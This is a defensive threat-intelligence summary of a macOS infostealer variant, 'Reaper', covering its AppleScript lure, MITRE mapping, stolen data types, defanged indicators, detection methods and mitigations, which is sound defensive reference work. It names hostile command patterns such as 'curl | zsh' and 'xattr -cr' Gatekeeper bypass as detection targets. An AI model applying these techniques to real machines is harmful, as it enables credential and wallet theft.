Full Report
A new variant of the 'SHub' macOS infostealer uses AppleScript to show a fake security update message and installs a backdoor. [...]
Analysis Summary
This summary provides a technical breakdown of the SHub macOS infostealer variant, known as "Reaper," based on the provided intelligence.
# Tool/Technique: SHub (Variant: Reaper)
## Overview
Reaper is a sophisticated macOS infostealer and backdoor that evolved from the "SHub" malware family. It employs a novel infection chain using the `applescript://` URL scheme to bypass recent macOS security mitigations (specifically Tahoe 26.4 Terminal protections). Its primary purpose is the exfiltration of browser data, cryptocurrency wallets, and sensitive documents, while maintaining persistence to act as a remote access backdoor.
## Technical Details
- **Type**: Malware family (Infostealer / Backdoor)
- **Platform**: macOS
- **Capabilities**: Credential theft, cryptocurrency hijacking, file exfiltration, environment fingerprinting, and remote command execution.
- **First Seen**: May 2026 (Reported)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (Fake app installers/Miro/WeChat lures)
- **TA0002 - Execution**
- T1059.002 - Command and Scripting Interpreter: AppleScript
- T1204.001 - User Execution: Malicious Link
- **TA0003 - Persistence**
- T1543.001 - Create or Modify System Process: Launch Agent
- **TA0005 - Defense Evasion**
- T1140 - Deinterlace/Decode Files or Information (ASCII art obfuscation)
- T1518.001 - Software Discovery: Security Software (VM/VPN detection)
- T1553.001 - Subvert Trust Controls: Gatekeeper Bypass (`xattr -cr`)
- T1614.001 - System Location Discovery: System Language Discovery (CIS/Russian keyboard check)
- **TA0006 - Credential Access**
- T1555 - Credentials from Password Stores
- **TA0009 - Collection**
- T1005 - Data from Local System (Filegrabber module)
- **TA0011 - Command and Control**
- T1102.002 - Web Service: Bidirectional Communication (Telegram bot API)
## Functionality
### Core Capabilities
- **Browser Data Theft**: Targets Chrome, Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion.
- **Crypto Hijacking**: Steals data from MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite.
- **Credential Harvesting**: Prompts for the macOS user password via fake UI to decrypt Keychains and access protected data.
- **File Exfiltration**: A "Filegrabber" module scans Desktop and Documents for sensitive files (PDF, docx, etc.) under specific size limits (2MB-6MB).
### Advanced Features
- **URL Scheme Exploitation**: Uses `applescript://` to launch the native Script Editor, bypassing Terminal-based "ClickFix" protections.
- **Wallet Injection**: Terminates legitimate wallet applications and replaces their core logic (`app.asar`) with a malicious version.
- **Anti-Analysis/Geofencing**: Fingerprints devices for VMs/VPNs and exits immediately if a Russian/CIS keyboard layout is detected.
- **Persistence & Backdoor**: Installs a LaunchAgent masquerading as a Google update service that beacons every minute and can execute remote payloads.
## Indicators of Compromise
- **File Names**:
- `app.asar` (Malicious wallet replacement)
- Google software update masquerade files in LaunchAgents.
- **Network Indicators**:
- qq-0732gwh22[.]com
- mlcrosoft[.]co[.]com
- mlroweb[.]com
- Telegram API (used for C2/telemetry).
- **Behavioral Indicators**:
- Execution of `osascript` following a Script Editor launch.
- Usage of `xattr -cr` on application bundles.
- Sudden termination and modification of cryptocurrency wallet processes.
- Unauthorized requests for system passwords via AppleScript dialogs.
## Associated Threat Actors
- **SHub Operators**: An evolving group focusing on macOS targets, shifting from Terminal-based "ClickFix" attacks to AppleScript-based lures.
## Detection Methods
- **Signature-based**: Detection of the malicious `app.asar` hash and specialized AppleScript strings hidden in ASCII art.
- **Behavioral**:
- Monitoring for `osascript` or `curl | zsh` patterns initiated by the Script Editor.
- Alerting on the creation of new LaunchAgents in the `com.google...` namespace that do not originate from legitimate Google installers.
- Monitoring the `applescript://` URL scheme activity.
## Mitigation Strategies
- **User Education**: Training users to recognize that official Apple security updates are never delivered via the macOS Script Editor or "Run" prompts in a browser.
- **Endpoint Hardening**: Use MDM profiles to restrict the usage of sensitive URL schemes or monitor the execution of `osascript`.
- **Access Control**: Implement strict "least privilege" models; monitor for unexpected `xattr` attribute removals which indicate Gatekeeper bypass attempts.
## Related Tools/Techniques
- **ClickFix**: The precursor technique involving social engineering users into pasting code into the Terminal.
- **XProtectRemediator**: Exploits user trust in this legitimate macOS security tool by spoofing its notifications.